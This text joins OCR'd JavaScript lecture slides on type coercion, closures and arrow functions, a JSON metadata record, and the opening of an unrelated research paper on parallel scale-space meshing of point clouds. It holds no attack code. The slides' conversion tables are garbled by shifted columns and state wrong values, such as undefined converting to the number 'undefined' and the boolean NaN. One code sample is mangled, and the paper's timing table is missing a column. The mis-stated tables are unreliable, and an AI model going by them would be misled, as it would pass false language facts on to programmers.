<td>&quot;6.022e+24&quot;</td> <td>true</td> <td></td> </tr> </tbody> </table> ## Conversion of Primitive Values <table> <thead> <tr> <th>boolean</th> <th>string</th> <th>number</th> <th>boolean</th> </tr> </thead> <tbody> <tr> <td><code>true</code></td> <td>&quot;true&quot;</td> <td>1</td> <td></td> </tr> <tr> <td><code>false</code></td> <td>&quot;false&quot;</td> <td>0</td> <td></td> </tr> </tbody> </table> <table> <thead> <tr> <th>strings</th> <th>string</th> <th>number</th> <th>boolean</th> </tr> </thead> <tbody> <tr> <td>&quot;&quot;</td> <td>0</td> <td></td> <td>false</td> </tr> <tr> <td>&quot; &quot;</td> <td>0</td> <td></td> <td>true</td> </tr> <tr> <td>&quot;1.2&quot;</td> <td>1.2</td> <td></td> <td>true</td> </tr> <tr> <td>&quot;0&quot;</td> <td>0</td> <td></td> <td>true</td> </tr> <tr> <td>&quot;one&quot;</td> <td>NaN</td> <td></td> <td>true</td> </tr> </tbody> </table> ## Conversion of Primitive Values <table> <thead> <tr> <th></th> <th>string</th> <th>number</th> <th>boolean</th> </tr> </thead> <tbody> <tr> <td><strong>undefined</strong></td> <td>undefined</td> <td>&quot;undefined&quot;</td> <td>NaN</td> </tr> <tr> <td><strong>null</strong></td> <td>null</td> <td>&quot;null&quot;</td> <td>0</td> </tr> </tbody> </table> Summary of (Simple?) Rules - How do numbers convert to things? - Boolean: 0 is false, non-0 is true (exception: NaN) - How do strings convert to things? - Numbers: non-valid syntax give NaN (exception: empty/blank give 0) - Boolean: true, only empty string is false - How does undefined convert to things? - Number: NaN - How does null convert to things? - Number: 0 How do things convert to boolean? - Empty string is `false` - Numbers (+/-) 0 and `NaN` are `false` - `undefined` and `null` are `false` Aka “falsy” (vs. “truthy”) Importance: Boolean contexts ``` if (pet) ... ``` Pitfall: `&&`, `||` may not result in a boolean - `x || y` means `x ? x : y` (first `x` converted) ``` p = "cat" || "dog" //=> p == "cat" ``` - Old idiom: `!!x` forces conversion to boolean ``` p = !!("cat" || "dog") //=> p == true ``` Easier? Column-Major View - How do things convert to Numbers? - Empty (and whitespace) string is 0 - Non-numeric strings are NaN - `undefined` is NaN - `null` is 0 - Importance: Used in `==` evaluation == Evaluation is... Different - When types do not match, coerce: - `null & undefined` (only) equal each other - Strings & booleans converted to `numbers`: - "1.0" == true && "" == false - Pitfall: `NaN` is not equal to `NaN` - When one operand is an object: - Convert via `valueOf` (or `toString`) - Result then compared with usual `==` rules - Note: no coercion when both operands are references (`==` is reference equality) - Note: - `===` never coerces To Ponder Evaluate: True or false? \[ true == '1' \] \[ 'false' == false \] \[ 0 == '0' \] \[ 0 == '' \] \[ NaN == NaN \] Surprising Consequences false == 'false' //=> false == '0' //=> !!'0' //=> ('0' == 0) && (0 == '') && ('0' != '') //=> (NaN == true) || (NaN == false) //=> !!NaN //=> (NaN != 0) && (!!NaN == !!0) //=> - dorey.github.io/JavaScript-Equality-Table Surprising Consequences false == 'false' //=> false false == '0' //=> true !!'0' //=> true ('0' == 0) && (0 == '') && ('0' != '') //=> true (NaN == true) || (NaN == false) //=> false !!NaN //=> false (NaN != 0) && (!!NaN == !!0) //=> true - dorey.github.io/JavaScript-Equality-Table Functions are People too - Named functions: declaration & use ```javascript function foo(a, b) { ... } foo("hi", 3); ``` - Anonymous functions ```javascript function(a, b) { ... } // how do we invoke such a thing? ``` - Functions are objects (first-class citizens) - They can be assigned to variables! ```javascript let foo = function(a, b) {...}; foo("hi", 3); let bar = foo; // cf. let bar = foo(); bar("world", 17); ``` Functions are Objects ```javascript Circle this.centerX = x; this.centerY = y; ... Etc ... return Math.PI * this.radius * this.radius ``` Functions Can Be Arguments ```javascript function apply(x, a) { return x(a); // x is a function! } function square(i) { return i * i; } apply(square, 5) //=> 25 ``` Functions Can Be Return Values ```javascript function grantDegree() { function addTitle(name) { return "Dr. " + name; } return addTitle; // a function! } let phd = grantDegree(); phd("Turing"); // phd is a function phd(3/2); //=> "Dr. 1.5" ``` Closures ```javascript function greaterThan(bound) { function compare (value) { return value > bound; } return compare; // 1-arg function } let testPos = greaterThan(0); testPos(4) //=> true testPos(-3) //=> false ``` Closures + Anonymity ```javascript function greaterThan(bound) { function compare (value) { return value > bound; } return compare; // 1-arg function } let testPos = greaterThan(0); testPos(4) //=> true testPos(-3) //=> false ``` function greaterThan(bound) { let compare = function(value) { return value > bound; } return compare; // 1-arg function } let testPos = greaterThan(0); testPos(4) //=> true testPos(-3) //=> false Closures + Anonymity ```javascript function greaterThan(bound) { return function(value) { return value > bound; } } let testPos = greaterThan(0); console.log(testPos(4)); // => true console.log(testPos(-3)); // => false ``` Arrow Function Expressions - Concise notation for anon. functions - Syntax: - Omit `function` keyword - Place arrow `=>` between params and body - `(a, b = 10) => { ... }` - `(r) => { return Math.PI*r**2 }` - For one-liner, can omit `return` and `{}`’s - `(r) => Math.PI * r**2` - For one parameter, can omit `()` - `r => Math.PI * r**2` - Use where function expressions needed - `let area = r => Math.PI * r**2` Closures + Anonymity Revisited ```javascript function greaterThan(bound) { return value => value > bound; } let testPos = greaterThan(0); testPos(4) //=> true testPos(-3) //=> false ``` IIFE - Immediately Invoked Function Expression - Define *and* invoke function at the same time - Basic forms: - `(function() { /* code here */ })();` - `let n = function() { /* code here */ }();` - Work-around for weird JavaScript scoping - `var` scopes variables to the enclosing *function* - IIFE creates a lexical scope (with closures) - Modern JavaScript has `let` (and `const`) - These scope variables to the enclosing *block* - General advice: prefer `let` to `var` - IIFEs are still encountered in the wild Summary - Truthy, falsey, and friends - Type coercion is everywhere - Coerce to boolean in conditionals - Coerce to number for == - Functions as first-class citizens - Can be passed as arguments - Can be returned as return values! - Closure: carry their context
{"Source-Url": "http://web.cse.ohio-state.edu/~giles.25/3901/lectures/lecture15.pdf", "len_cl100k_base": 4934, "olmocr-version": "0.1.50", "pdf-total-pages": 54, "total-fallback-pages": 0, "total-input-tokens": 77138, "total-output-tokens": 6849, "length": "2e12", "weborganizer": {"__label__adult": 0.00028133392333984375, "__label__art_design": 0.00028967857360839844, "__label__crime_law": 0.00012803077697753906, "__label__education_jobs": 0.0008420944213867188, "__label__entertainment": 8.83936882019043e-05, "__label__fashion_beauty": 0.00010019540786743164, "__label__finance_business": 0.00010389089584350586, "__label__food_dining": 0.00028133392333984375, "__label__games": 0.0004417896270751953, "__label__hardware": 0.0005288124084472656, "__label__health": 0.00017917156219482422, "__label__history": 0.00016367435455322266, "__label__home_hobbies": 7.665157318115234e-05, "__label__industrial": 0.00018775463104248047, "__label__literature": 0.00022852420806884768, "__label__politics": 0.00010448694229125977, "__label__religion": 0.000324249267578125, "__label__science_tech": 0.002147674560546875, "__label__social_life": 9.08970832824707e-05, "__label__software": 0.006763458251953125, "__label__software_dev": 0.98583984375, "__label__sports_fitness": 0.00021898746490478516, "__label__transportation": 0.00022971630096435547, "__label__travel": 0.00017750263214111328}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 14892, 0.0154]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 14892, 0.60602]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 14892, 0.54776]], "google_gemma-3-12b-it_contains_pii": [[0, 170, false], [170, 225, null], [225, 734, null], [734, 954, null], [954, 1237, null], [1237, 1549, null], [1549, 2023, null], [2023, 2086, null], [2086, 2375, null], [2375, 2824, null], [2824, 3028, null], [3028, 3285, null], [3285, 3575, null], [3575, 3894, null], [3894, 4270, null], [4270, 4385, null], [4385, 4606, null], [4606, 4748, null], [4748, 4838, null], [4838, 4997, null], [4997, 5157, null], [5157, 5230, null], [5230, 5403, null], [5403, 5535, null], [5535, 5896, null], [5896, 6084, null], [6084, 6381, null], [6381, 6541, null], [6541, 6736, null], [6736, 7263, null], [7263, 7590, null], [7590, 8014, null], [8014, 8456, null], [8456, 8931, null], [8931, 9183, null], [9183, 9564, null], [9564, 10026, null], [10026, 10238, null], [10238, 10715, null], [10715, 10843, null], [10843, 11118, null], [11118, 11445, null], [11445, 11903, null], [11903, 12046, null], [12046, 12222, null], [12222, 12491, null], [12491, 12736, null], [12736, 12991, null], [12991, 13209, null], [13209, 13452, null], [13452, 13880, null], [13880, 14083, null], [14083, 14617, null], [14617, 14892, null]], "google_gemma-3-12b-it_is_public_document": [[0, 170, true], [170, 225, null], [225, 734, null], [734, 954, null], [954, 1237, null], [1237, 1549, null], [1549, 2023, null], [2023, 2086, null], [2086, 2375, null], [2375, 2824, null], [2824, 3028, null], [3028, 3285, null], [3285, 3575, null], [3575, 3894, null], [3894, 4270, null], [4270, 4385, null], [4385, 4606, null], [4606, 4748, null], [4748, 4838, null], [4838, 4997, null], [4997, 5157, null], [5157, 5230, null], [5230, 5403, null], [5403, 5535, null], [5535, 5896, null], [5896, 6084, null], [6084, 6381, null], [6381, 6541, null], [6541, 6736, null], [6736, 7263, null], [7263, 7590, null], [7590, 8014, null], [8014, 8456, null], [8456, 8931, null], [8931, 9183, null], [9183, 9564, null], [9564, 10026, null], [10026, 10238, null], [10238, 10715, null], [10715, 10843, null], [10843, 11118, null], [11118, 11445, null], [11445, 11903, null], [11903, 12046, null], [12046, 12222, null], [12222, 12491, null], [12491, 12736, null], [12736, 12991, null], [12991, 13209, null], [13209, 13452, null], [13452, 13880, null], [13880, 14083, null], [14083, 14617, null], [14617, 14892, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 14892, null]], "pdf_page_numbers": [[0, 170, 1], [170, 225, 2], [225, 734, 3], [734, 954, 4], [954, 1237, 5], [1237, 1549, 6], [1549, 2023, 7], [2023, 2086, 8], [2086, 2375, 9], [2375, 2824, 10], [2824, 3028, 11], [3028, 3285, 12], [3285, 3575, 13], [3575, 3894, 14], [3894, 4270, 15], [4270, 4385, 16], [4385, 4606, 17], [4606, 4748, 18], [4748, 4838, 19], [4838, 4997, 20], [4997, 5157, 21], [5157, 5230, 22], [5230, 5403, 23], [5403, 5535, 24], [5535, 5896, 25], [5896, 6084, 26], [6084, 6381, 27], [6381, 6541, 28], [6541, 6736, 29], [6736, 7263, 30], [7263, 7590, 31], [7590, 8014, 32], [8014, 8456, 33], [8456, 8931, 34], [8931, 9183, 35], [9183, 9564, 36], [9564, 10026, 37], [10026, 10238, 38], [10238, 10715, 39], [10715, 10843, 40], [10843, 11118, 41], [11118, 11445, 42], [11445, 11903, 43], [11903, 12046, 44], [12046, 12222, 45], [12222, 12491, 46], [12491, 12736, 47], [12736, 12991, 48], [12991, 13209, 49], [13209, 13452, 50], [13452, 13880, 51], [13880, 14083, 52], [14083, 14617, 53], [14617, 14892, 54]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 14892, 0.04211]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
5fdcea4c7bc22bff098766d487177fabdb914e5a
An Implementation and Parallelization of the Scale-Space Meshing Algorithm Julie Digne To cite this version: HAL Id: hal-01238790 https://hal.archives-ouvertes.fr/hal-01238790 Submitted on 9 Dec 2015 HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. An Implementation and Parallelization of the Scale-Space Meshing Algorithm Julie Digne LIRIS, CNRS UMR 5205, Université Lyon 1 (julie.digne@liris.cnrs.fr) Abstract Creating an interpolating mesh from an unorganized set of oriented points is a difficult problem which is often overlooked. Most methods focus indeed on building a watertight smoothed mesh by defining some function whose zero level set is the surface of the object. However in some cases it is crucial to build a mesh that interpolates the points and does not fill the acquisition holes: either because the data are sparse and trying to fill the holes would create spurious artifacts or because the goal is to explore visually the data exactly as they were acquired without any smoothing process. In this paper we detail a parallel implementation of the Scale-Space Meshing algorithm, which builds on the scale-space framework for reconstructing a high precision mesh from an input oriented point set. This algorithm first smoothes the point set, producing a singularity free shape. It then uses a standard mesh reconstruction technique, the Ball Pivoting Algorithm, to build a mesh from the smoothed point set. The final step consists in back-projecting the mesh built on the smoothed positions onto the original point set. The result of this process is an interpolating, hole-preserving surface mesh reconstruction. Source Code The ANSI C++ source code permitting to reproduce results from the on-line demo is available at the IPOL web page of this article. The scale-space meshing algorithm uses the Ball Pivoting Algorithm which is linked to patent US6968299B1. It is made available for the exclusive aim of serving as a scientific tool to verify the soundness and completeness of the algorithm description. Keywords: surface reconstruction; scale-space 1 Introduction Surface mesh reconstruction methods can be divided into two categories: methods that build a closed surface out of the input point set (implicit surface methods) and methods that aim at finding a mesh whose vertices are the input point set. While the first approach is widely spread because it generates smooth, closed and economical meshes, usually by extracting the zero level set of some potential field ([8], [9], [10]), the second kind of approach is crucial in some cases, when the surface is intrinsically... open, or when one wants to visualize exactly the outcome of the laser scanner. For example, a LIDAR device acquiring a town yields point sets that are impossible to reconstruct with implicit surface reconstruction methods. And even in the case of a laser-scanner acquired object surface, an implicit surface reconstruction method will lose the input surface accuracy: it will reconstruct a smooth surface. In this paper we are interested in the second kind of approach, which aims at building a mesh interpolating the initial point set. Most mesh interpolating methods are based on building a Delaunay diagram of the input point set and filtering facets. Though efficient, these processes involve building a global structure that is not always desirable. To overcome this limitation, the Ball Pivoting Algorithm is a powerful heuristic for building a Delaunay-like triangulation of scattered 3D points without resorting to a global structure. It was introduced by [1] and provided a way to build an interpolating mesh in contrast with other research directions aiming at building an approximating mesh (e.g. [2], [8], [9], [10]). Although this method works well for noiseless data, or data with details at a scale coherent with the chosen radius of the ball, it fails dramatically when data contains small details or noise, as will be shown in Section 7. Yet if the data have to be smoothed before building the mesh, then the interpolating property of the method is lost. To overcome this limitation [6] proposed a method that, through the use of a scale-space, allows for a better interpolation of the original raw points even in the presence of noise and small details. A scale-space is a representation of a shape at different geometric scales, i.e. at different degrees of smoothness. The principle behind the scale-space meshing method is that once the shape is smoothed, one can use a standard surface mesh reconstruction algorithm to interpolate the point set. The mesh for the original scale can then be deduced from the smoothed scale mesh. In short, the scale-space meshing is one of the applications of the scale-space framework, which can be used to infer a wide variety of information on an original point set by estimating it on a smoother version of it. This paper describes a parallel implementation of the scale-space meshing algorithm. The mesh reconstruction part of the algorithm is based on the Ball Pivoting Algorithm for which we provide a parallel implementation slightly adapted from [3], where the reader will find all necessary details on the data structures. The next paragraph is a brief reminder of the data structures used in this implementation. Data structures. The scale-space meshing algorithm needs two important data structures: a search structure that allows for fast queries of neighborhoods and a mesh structure that will be built incrementally. The search structure is an octree that will store the points and provide methods for fixed range neighborhood queries. The mesh structure we build is a manifold with holes structure: a set of triangular facets between vertices were each triangle edge can only be adjacent to two facets, and edges with only one adjacent triangle are authorized. We refer the reader to [3] for all the details on these two structures. The remainder of this paper is organized as follows: Section 2 explains the scale-space and its particular implementation. Section 3 explains how the scale-space framework is used in the reconstruction setting. Section 4 describes the parallelization of the method. Section 5 deals with the choice of parameters for the method. Section 6 explains the dependencies of the code. Finally Section 7 shows several experiments using the Scale-Space Meshing algorithm and offers comparisons with other existing methods. 2 A Scale-Space for Point Sets 2.1 Definitions Let $\mathcal{M}$ be a smooth surface in $\mathbb{R}^3$ assumed to be at least $C^2$. At each point $x$ of the surface one can define a normal direction $n(x)$, a vector perpendicular to the tangent plane. There are two possible orientations for this vector (pointing either inwards or outwards). In the continuous surface setting, the normal $n(x)$ is always oriented towards the concavity of the shape. At each point $x$, one can pick a normal plane containing the normal and a chosen tangent direction (i.e. a vector in the tangent plane). The intersection of this plane and the surface is a planar curve whose curvature at $x$ is the surface directional curvature corresponding to the chosen tangent direction. The principal curvatures $k_1(x)$ and $k_2(x)$ of the surface at $x$ are defined as the minimum and maximum directional curvatures of the surface and the mean curvature of $\mathcal{M}$ at $x$ is $H(x) = \frac{1}{2}(k_1(x) + k_2(x))$. The scale-space for point sets is described in [5] and [6]. It consists in applying the mean curvature motion (MCM) to a set of points. The mean curvature is written: $$\frac{\partial x}{\partial t} = H(x)n(x).$$ In other words, all points move toward the concavity of the shape at a rate equal to the surface mean curvature. 2.2 Mean Curvature Motion Implementation As shown in [6], the mean curvature motion can be approximated by the iterative process of projecting each point of the data set onto its local regression plane. The iterative projection process allows for the computation of robust geometric information (after several scale-space iterations) and this geometric information can be backtracked to the initial scale, for example by associating the curvature of an evolved point computed at a scale $t$ with the initial position of the point at scale 0. The method for computing one step of the mean curvature motion is explained in Algorithm 1. Numerically, the orientation of the normal is different from the continuous case: the normals are not oriented toward the concavity but consistently over the surface (i.e. all normals point either inwards or outwards). The projection algorithm making no use of the normal, the choice of the orientation is irrelevant for the mean curvature motion, but having this information is useful for the ball pivoting algorithm. Algorithm 1: $MCM(p, P, r)$: One step of the Mean Curvature Motion (MCM) Input: A point set $P$, a query point $p$, a radius $r$ Output: A point $p'$, result of one discrete step of the MCM applied to $p$ 1. Get the set of neighbors $\mathcal{N}_r(p)$ out of $O$; 2. if $\#\mathcal{N}_r(p) < 5$ then 3. Remove point $p$ 4. $\bar{p} \leftarrow \frac{\sum_{q \in \mathcal{N}_r(p)} w(q) q}{\sum_{q \in \mathcal{N}_r(p)} w(q)}$ and $C \leftarrow \sum_{q \in \mathcal{N}_r(p)} w(q)(q - \bar{p})\cdot(q - \bar{p})^T$; 5. $v_0 \leftarrow$ eigenvector corresponding to the least eigenvalue of $C$; 6. $p' \leftarrow p - \langle p - \bar{p}, v_0 \rangle v_0$; 7. $p'.n \leftarrow \frac{p - p'}{\|p - p'\|} \cdot \text{sign}(\langle p - p', p.n \rangle)$; Three steps require some explanations: • Line 3: If the point does not have enough neighbors, it is considered as an outlier and discarded. • Line 4: \( w(q) \) ensures stability of the approximation by giving more weight to neighboring points than to remote points: \[ w(q) = \exp\left(-\frac{\|p - q\|^2}{2\gamma^2}\right). \] • Line 6: The regular mean curvature motion would stop after line 6, yet we use a slightly modified motion where the normals are smoothed jointly with the positions, to reflect the normal direction of the current shape (line 7). Smoothing normals is important in case of noisy normals input but also to improve the performances of the Ball Pivoting. The barycenter and covariance computation (Line 4 - function \textit{performLocalPCA} in the code) is performed using a numerically stable online Algorithm [14]. The covariance matrix being a \( 3 \times 3 \) real symmetric matrix, a simple ad hoc eigendecomposition algorithm is used [13]. Algorithm 1 is exactly one step of the projection on the Moving Least Squares Surface of order 1 (MLS1) induced by the point set. Moving Least Squares Surfaces are surfaces defined locally by performing an explicit surface regression (e.g. a polynomial surface defined over the local tangent plane) around a position. 2.3 Scale-Space Implementation As previously stated, the discrete scale-space consists in applying Algorithm 1 to the whole point set. In practice, the iterations require building a new point set after each iteration. But there is no need to keep at each step all the results of all the iterations. In fact, we only need to store the original point set (for back-projection, which will be explained later), the result of the last iteration and a buffer for the point set being constructed at the current iteration. Compared to [3], points are still stored in an octree, but the nodes of the octree do not contain a single set of points but three sets of points. The first set contains the points of the original cloud and the other two serve for storing intermediary scale-space iterations. More precisely, Set 0 will be preserved, it contains the original point positions. Sets 1 and 2 are alternatively the result of the previous and current scale-space iterations. The octree always stores the index of the current set and updates it after each iteration. Spatial queries are only slightly modified by this, the same octree is traversed using the same method with the only difference that the lists with the current index are considered at each iteration, while the others are ignored. In practice, when applying the mean curvature motion to either the initial point set or to the result of an even number of iterations, the result of the projection will be stored in Set 1. The result of an odd number of projection iterations will be stored in Set 2. This way the initial and final sets will always be available. In addition, each point keeps track of the point of \( P_0 \) it originated from (Algorithm 2, lines 3 and 10). For completeness, we summarize the method in Algorithm 2. In practice, the implementation uses a little trick to be faster. Instead of getting the neighbors of each point \textit{from scratch}, it uses the fact that when looking for neighbors, one needs to get the cell containing the point at a given depth [3]. Yet for all points of a given cell this parent cell is the same. The process is then to traverse the octree in a depth-first manner: when a cell \( A \) at the right depth is reached, the cell is stored and the traversal continues, until a leaf descending from \( A \) is reached. Thus the points in this leaf will be processed faster, since there is no need to look for the right ancestor node for each point. This is why there are overloaded \textit{applyScaleSpace} functions in the code. We refer the reader to [3] for a precise explanation of the neighbor search functions. In the end one has the original point set, the result of the scale-space iteration and a correspondence between the points of both point sets which allows for the \textit{back-projection} of the mesh obtained at a coarse scale to obtain the final fine scale mesh. Contrary to other existing scale-space Algorithm 2: scale_space(\(\mathcal{P}, N, r\)): applying the scale-space iterations to a point set \(\mathcal{P}\) **Input:** A point set \(\mathcal{P}\) a number of iterations \(N\) and a radius \(r\) **Output:** A modified point set \(\mathcal{P}_N\) 1. Sort and store \(\mathcal{P}\) in \(\mathcal{P}_0\) endowed with an octree structure; 2. for \(p \in \mathcal{P}_0\) do 3. Set \(p\).origin \(\leftarrow p\); 4. \(idx \leftarrow 0\); 5. for \(i = 0, \ldots, N - 1\) do 6. \(new_idx \leftarrow \text{mod}(idx, 2) + 1\); 7. for \(p \in \mathcal{P}_{idx}\) do 8. \(p' \leftarrow \text{MCM}(p, \mathcal{P}_{idx}, r)\); 9. Store \(p'\) in \(\mathcal{P}_{new_idx}\); 10. \(p'.origin \leftarrow p.origin\); 11. if \(idx > 0\) then 12. Erase \(\mathcal{P}_{idx}\) 13. \(idx \leftarrow new_idx\); structures (e.g. [11]), this scale-space does not iteratively subsample the shape: the same amount of points is preserved throughout the scale-space iterations. It is a geometric multi-resolution scheme, where the initial shape becomes increasingly smooth but the data size instead does not change. In practice however, some points might be lost if their neighborhoods do not contain enough points for estimating a regression plane, but this loss is minimal (less than 0.1% of the points in general). The result of the scale-space iterations is a denoised point set representing a smooth surface. This is precisely the kind of data that is very easily meshed by an interpolating method, such as the Ball Pivoting Algorithm [1]. The next section explains how to use this scale-space for meshing an input point set. 3 Using the Scale-Space for Surface Reconstruction The scale-space meshing algorithm is summarized in Figure 1. It consists of three steps: - **Scale-space iterations.** The scale-space is iterated on the point set as described in Section 2. - **Meshing step.** A triangular mesh is built out of the smoothed point set resulting from the scale-space iterations. - **Back-projection.** The resulting mesh is back-projected onto the original point set, creating an interpolating mesh. The scale-space iteration step consists in applying Algorithm 2 to the set of points and does not require any further explanation. Notice that if the number of scale-space iterations is 0, then the scale-space meshing reduces to the traditional Ball Pivoting Algorithm. The next subsections detail the meshing and back projecting steps. 3.1 Input Data The input data of the algorithm is a set of oriented points, an unorganized set of points consistently oriented. In other words, all normals should point either inwards or outwards. These normals are required by the Ball Pivoting Algorithm to ensure that the resulting surface mesh is orientable. It is important to notice that the scale-space iterations themselves do not require this knowledge: the MCM can be applied to points without normals since computing the regression plane does not use this information. 3.2 Meshing Step The only constraint on the meshing method is that it should interpolate the points and not create any additional vertex. We chose to use the Ball Pivoting Algorithm [1], whose implementation is described thoroughly in [3]. We use this implementation to reconstruct an interpolating surface from the smoothed positions. In a nutshell, the Ball Pivoting Algorithm builds incrementally a manifold mesh from an input point set by adding a triangle to the mesh if there is an empty-interior ball of fixed radius \( r \) passing through three data points. It then creates a triangle and the ball is pivoted around each of the edges until another point is met. The process being incremental, it allows for a fast parallelization. The resulting triangulated surface is a manifold mesh possibly with holes and multiple connected components. The mesh is efficiently constructed on the smoothed point set and is therefore not interpolating the original point set, which is why a back-projection is performed next. At the end of the Ball Pivoting Algorithm, similarly to [3], we apply an additional step to fill triangular holes that may remain. We refer the reader to [3] for details about this step. 3.3 Back-projection Back-projecting the resulting mesh on the original point set is simple since every point of the last point set keeps a track of the point it originated from (see lines 3 and 10 of Algorithm 2). Therefore we simply have to transfer the connectivity from a point to its origin. The back-projection is summed up in Algorithm 3. In the proposed implementation it is done directly when saving the mesh. **Algorithm 3:** \textit{back\_project}(\( M_N \)) back projecting the final mesh \begin{algorithm} \textbf{Input}: A surface mesh \( M_N \) of the last smoothed point set \( P_N \) \textbf{Output}: A surface mesh \( M_0 \) of the initial point set \( P_0 \) \begin{algorithmic}[1] \State \textbf{for each triangle} \( t \in M_N \) \textbf{do} \State \hspace{1em} Let \( v_0, v_1, v_2 \) be the vertices of \( t \); \State \hspace{1em} Create a triangle \( t' \) with vertices \( v_0.\text{origin}, v_1.\text{origin}, v_2.\text{origin} \); \State \hspace{1em} Add \( t' \) to \( M_0 \); \end{algorithmic} \end{algorithm} The result of this back-projection is an interpolating mesh of the original point set. Yet, the back-projection process does not guarantee that the final mesh will be self-intersection free. By construction, the coarse scale mesh cannot self-intersect. Yet, moving each point to its original position might cause self-intersections of the mesh. For a reasonable radius and number of iterations, this phenomenon was not observed or at least not in a way that would hinder the visualization. The output of the algorithm is a set of vertices linked by triangular facets stored in the Stanford PLY format. In this format each facet is given by the three indices of its vertices. The indices are given in a clockwise order relatively to the oriented normal of the facet. This is done in this implementation in the `saveOrientedFacet` function (class FileIO). \section{Parallelization} The scale-space meshing algorithm consisting in very local computations the process parallelizes nicely provided some precautions are taken. The octree data structure is used to sort cells into sets, each set containing cells that can be processed independently as shown in Figure 2. This parallelization is done for both the scale-space iterations and the meshing step. For the scale-space iterations, each thread processes a different cell (see Algorithm 4). Processing a cell consists in applying the scale-space to all the points in the cell and storing them in the corresponding set. The only precaution to take is to check that the projected points obtained in two different threads will not be stored in the same set of the same cell, since that would cause conflicts between the threads. Since the projection of a point $p$ lies inside a ball with radius $r$ centered at $p$, it is enough to ensure that for two cells processed simultaneously, their dilatations of radius $r$ do not contain a common leaf cell. The processing depth is therefore set as the minimum depth such that the size of the cell is above $d = 2.1r$, and at least 1 (Algorithm 4, lines 1-2). This is easily done by computing $$\text{level} = \max(\text{octree.depth} - \lfloor \log_2 \frac{\text{octree.size}}{d}\rfloor, 1), \quad (1)$$ where $\text{octree.size}$ is the length of the largest size of the bounding box. The only remaining possible conflict happens when two threads simultaneously try to add a point in a branch not yet created. Though this case is rare, it is handled by preventing the simultaneous creation of branches (critical section in method `addPoint` of class Octree). The Ball Pivoting Algorithm is parallelized similarly and we refer the reader to [3] for more details. Computation times for the whole Scale-Space meshing algorithm with and without parallelization are given in Table 1 for a computation on a 4 cores laptop ($4 \times 2.9$GHz). ![Figure 2: Parallelization principle in 2D. Cells that can be processed simultaneously are depicted in the same color.](image-url) Table 1: Computation time with and without parallelization for a 4 core laptop (4 × 2.9GHz). The number of iterations was set to 4 for all these point sets. <table> <thead> <tr> <th>Point set</th> <th>Number of Points</th> <th>Radius</th> <th>Computation Time</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> <td>Single-threaded</td> </tr> <tr> <td>Bunny</td> <td>360K</td> <td>0.0005</td> <td>21s</td> </tr> <tr> <td>Dragon</td> <td>1.5M</td> <td>0.0005</td> <td>328s</td> </tr> <tr> <td>Pyramid</td> <td>1M</td> <td>0.4</td> <td>515s</td> </tr> </tbody> </table> Algorithm 4: Parallelization of Scale-Space iterations. **Input**: An oriented input point cloud \( P \) sorted into an octree \( O \) with given depth, a radius \( r \). **Output**: A denoised point set stored in the octree \( O \). 1. \( d \leftarrow 2.1 \cdot r \); 2. \( l \leftarrow \max(1, \text{smallest level at which cells have size larger than } d) \) (cf Equation 1); 3. for \( i = 0 \cdots 8 \) do 4. \( \text{cells} \leftarrow \text{cells of the octree at level } l \text{ and with child index } i; \) 5. for \( C \in \text{cells} \) do in parallel 6. \( p' \leftarrow MCM(p, r, P); \) 7. \( C' \leftarrow \text{octree cell containing } p'; \) 8. Store \( p' \) in the point list of \( C' \) corresponding to the next index; 5 Parameters Choice There are three parameters for the scale-space and one parameter for the Ball Pivoting Algorithm. Yet those parameters can be set by choosing two values: a radius \( r \) and a number of iterations \( N \). Below, we explain how all the parameters of the scale-space and ball pivoting can be deduced from these two values. - **Scale-space parameters.** Three parameters are required by Algorithm 2: the radius of the projection filter, the standard deviation \( \sigma \) for the Gaussian weight, and the number of iterations. The scale-space radius is set to \( 2r \), the standard deviation is set to \( \sigma = 2r \) and the number of iterations is equal to \( N \). - **Ball Pivoting algorithm parameters.** The Ball Pivoting Algorithm needs a single parameter, the radius of the pivoting ball, which is taken equal to \( r \). One could choose unrelated radii for the projection filter and the ball radius but this setting is particularly well suited for the experiments. It is nevertheless very important that the radius of the projection filter is larger than the radius of the ball pivoting in order for the regression plane to be stable. The number of iterations is by default set to 4. If the shape is very noisy, one may set a higher number of iterations, but the details and sharp features are always contained in the first iterations, so that few iterations are necessary. A coarse heuristic for setting \( r \) consists in considering the number of points \( N_{\text{points}} \), the size of the bounding box \( l \) and deduce the radius: \( r = \sqrt{20/N_{\text{points}} \cdot l} \). Indeed, if the shape was a perfect sphere (enclosed in the same bounding box), its surface area would be \( 4\pi(l/2)^2 = \pi l^2 \), thus the number of points per unit surface would be \( \frac{N}{\pi l^2} \). The area of the surface in a neighborhood of radius \( r \) is approximated to \( \pi r^2 \) (given \( r << l \)), therefore to obtain around 20 neighbors, one should set \( r \) such that \( \frac{r^2 \pi}{2} = 20 \), hence the formula. The next section reviews some technical details of the provided code including dependencies. 6 Code The dependencies and properties of this implementation are the same as for the Ball Pivoting Algorithm [3], 